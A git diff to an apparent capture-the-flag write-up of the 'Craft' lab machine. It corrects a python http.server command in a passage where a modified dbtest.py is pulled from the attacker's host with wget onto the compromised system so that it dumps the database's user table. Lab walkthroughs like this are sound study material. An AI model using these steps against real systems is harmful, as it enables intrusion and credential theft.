--- a/_posts/2020-01-04-Craft.md
+++ b/_posts/2020-01-04-Craft.md
@@ -311,7 +311,7 @@ SQLALCHEMY_TRACK_MODIFICATIONS = False
 
 Secondly, the `dbtest.py` file is running a SQL query against the `brew` table which is referenced in `craft-api/craft_api/database/models.py` on Gogs. Along with the `brew` table, a `user` table is also referenced in the aforementioned file. Knowing this, the contents of `dbtest.py` can be modified to run a SQL query that will display the information from the `user` table instead of the boring information from the `brew` table.
 
-The `dbtest.py` file was edited on the local attacking system and then transferred to the remote system using `wget http://10.10.14.22/dbtest.py -O dbtest.py` (on the remote system's CLI) and `python3 http.server 80` (on the local system).
+The `dbtest.py` file was edited on the local attacking system and then transferred to the remote system using `wget http://10.10.14.22/dbtest.py -O dbtest.py` (on the remote system's CLI) and `python3 -m http.server 80` (on the local system).
 
 The newly modified `dbtest.py` file is represented below. Note the change to the `sql` variable and to the `result` variable.
 
